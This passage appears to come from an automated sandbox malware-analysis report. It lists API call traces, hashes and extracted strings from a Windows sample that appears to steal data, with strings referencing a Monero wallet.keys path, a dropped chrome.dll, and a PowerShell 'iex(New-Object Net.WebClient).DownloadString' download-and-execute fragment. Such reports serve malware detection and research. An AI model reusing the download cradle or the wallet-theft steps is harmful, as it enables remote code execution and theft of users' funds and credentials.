                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 02f1cb81e1df2d89dd0102e2f9b9f0982e5d0d045bc1d4b673d2cc672077b17d
                            • Instruction ID: eb8cf51a6c52c52a1220fc6285cfc59214353716b1803ed7b69e310c7871636b
                            • Opcode Fuzzy Hash: 02f1cb81e1df2d89dd0102e2f9b9f0982e5d0d045bc1d4b673d2cc672077b17d
                            • Instruction Fuzzy Hash: CA31FC74E00209EFDB14DFA5D889FAE7BB5AB48314F108158E951A7380D774AA81DFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 8317b1c7546854b67123857235255eead3ab99f36074f4fd661369ce4f17a567
                            • Instruction ID: 331836be9e72ca3c51f5fc102ba254de2eba5ea471e47c4ee2a4300d56044230
                            • Opcode Fuzzy Hash: 8317b1c7546854b67123857235255eead3ab99f36074f4fd661369ce4f17a567
                            • Instruction Fuzzy Hash: C241D7B150179C5EDB218B248DC5FFB7FE89B45704F1444E8EE8A97182E2719A44EFA0
                            APIs
                            • lstrcat.KERNEL32(?,0098DF38), ref: 00F44A2B
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F44A51
                            • lstrcat.KERNEL32(?,?), ref: 00F44A70
                            • lstrcat.KERNEL32(?,?), ref: 00F44A84
                            • lstrcat.KERNEL32(?,0097AED8), ref: 00F44A97
                            • lstrcat.KERNEL32(?,?), ref: 00F44AAB
                            • lstrcat.KERNEL32(?,0098D3F8), ref: 00F44ABF
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F20: GetFileAttributesA.KERNEL32(00000000,?,00F31B94,?,?,00F5577C,?,?,00F50E22), ref: 00F48F2F
                              • Part of subcall function 00F447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F447D0
                              • Part of subcall function 00F447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00F447D7
                              • Part of subcall function 00F447C0: wsprintfA.USER32 ref: 00F447F6
                              • Part of subcall function 00F447C0: FindFirstFileA.KERNEL32(?,?), ref: 00F4480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: f07f5abf60ce55a283fc5c1cce674668b3f7f645d473bbcb23560c9abb58be05
                            • Instruction ID: 1f75940b6a61dfb3fff720b757948701220ecbd50d4db2a48094dcd37fce9f27
                            • Opcode Fuzzy Hash: f07f5abf60ce55a283fc5c1cce674668b3f7f645d473bbcb23560c9abb58be05
                            • Instruction Fuzzy Hash: 113175B69002186BDB25FBB0DC8DEDD773CAB88700F404689B64596046DE78A7C9DB94
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F42FD5
                            Strings
                            • <, xrefs: 00F42F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F42F54
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F42F14
                            • ')", xrefs: 00F42F03
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: f16538176e02f67b6299e534675d5e59b9574ed379111d8972204f3f8189b82d
                            • Instruction ID: 22996195e1d4573bdd3f6e4470a7d5269f02d82c87d4475dc3bd490aa2b1b96d
                            • Opcode Fuzzy Hash: f16538176e02f67b6299e534675d5e59b9574ed379111d8972204f3f8189b82d
                            • Instruction Fuzzy Hash: 19412A71D402189BEB15FFA0CCA2BEDBF78AF50344F404558E90267192EF786A49DF92
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction ID: db2375e3886a8cbf253335c3d64afe022bfd1f211a3f84ac872480cb62fd5f63
                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction Fuzzy Hash: B42192F2E006A8AFDB229F55CD41A6F3A79EB83BB4F054115F8196B211C7344D41ABE0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,0097BCE8,00000000,00020119,?), ref: 00F47FEE
                            • RegQueryValueExA.ADVAPI32(?,0098D638,00000000,00000000,000000FF,000000FF), ref: 00F4800F
                            • RegCloseKey.ADVAPI32(?), ref: 00F48022
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: a0ebf2ca8e3ab4f990062744a59ab201c47d8f5f147ad95e9a8959720d1a0da2
                            • Instruction ID: a4c2a36cde40bc079b0e836243cb60686df1473f2ae5b4b73f40b81e381e3d6b
                            • Opcode Fuzzy Hash: a0ebf2ca8e3ab4f990062744a59ab201c47d8f5f147ad95e9a8959720d1a0da2
                            • Instruction Fuzzy Hash: C21191B2A40205EFD710CF88ED49F7FBBB8EB04B10F104219FA15A7285DB7568009BA1
                            APIs
                            • StrStrA.SHLWAPI(0098DFB0,00000000,00000000,?,00F39F71,00000000,0098DFB0,00000000), ref: 00F493FC
                            • lstrcpyn.KERNEL32(01207580,0098DFB0,0098DFB0,?,00F39F71,00000000,0098DFB0), ref: 00F49420
                            • lstrlen.KERNEL32(00000000,?,00F39F71,00000000,0098DFB0), ref: 00F49437
                            • wsprintfA.USER32 ref: 00F49457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: b204269efd9793c69feb07910336629024d4aeea4aeed1a7d820b763fd0332c1
                            • Instruction ID: ef5439ea6e46c5478778caddaf976a516b54603a2d1e23958bae79a8c0645be6
                            • Opcode Fuzzy Hash: b204269efd9793c69feb07910336629024d4aeea4aeed1a7d820b763fd0332c1
                            • Instruction Fuzzy Hash: CA010875600108FFCB05DFA8E948EAE7B79EB48304F108348FD499B686D631AA44DBA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F312B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F312BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F312D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F312F5
                            • RegCloseKey.ADVAPI32(?), ref: 00F312FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 26813eaebe5c6e5fdf01e39f5348a4397239b82c863194b776222613c261a7a8
                            • Instruction ID: dba3aba5772821d5fe7588ea359241e74f27f7d1d45a09b31048c7b896e37735
                            • Opcode Fuzzy Hash: 26813eaebe5c6e5fdf01e39f5348a4397239b82c863194b776222613c261a7a8
                            • Instruction Fuzzy Hash: F001E179A40209BFDB14DFD4EC89FAEB77DEB48701F104295FA4597285D770AA00DBA0
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F46903
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F469C6
                            • ExitProcess.KERNEL32 ref: 00F469F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 6281c8894ef018fd9f9f1980c0479dd410ee514e729694bbcf972ffc14fdc9a9
                            • Instruction ID: efc016aa1e43740331b78507ed7be38b2571964dc977f86c4cde63de6257b8a1
                            • Opcode Fuzzy Hash: 6281c8894ef018fd9f9f1980c0479dd410ee514e729694bbcf972ffc14fdc9a9
                            • Instruction Fuzzy Hash: 963130B1941218ABEB15EF90DC95FDEBB78EF48300F404189F60566181DF786B48CF65
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F50E10,00000000,?), ref: 00F489BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F489C6
                            • wsprintfA.USER32 ref: 00F489E0
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 7cf85009ffb9a9f6a5aa62388654a71570e1a78414dc1db14adf9a999bb60faf
                            • Instruction ID: f4c251b024e7eaca2903e8c92d922ce233340a8cb13d7e0b54e4dda3596682e1
                            • Opcode Fuzzy Hash: 7cf85009ffb9a9f6a5aa62388654a71570e1a78414dc1db14adf9a999bb60faf
                            • Instruction Fuzzy Hash: 0A214FB1A40204EFDB10DF94ED49FAEBBB8FB48711F104219FA15A7285CB75AD00CBA1
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F3A098
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
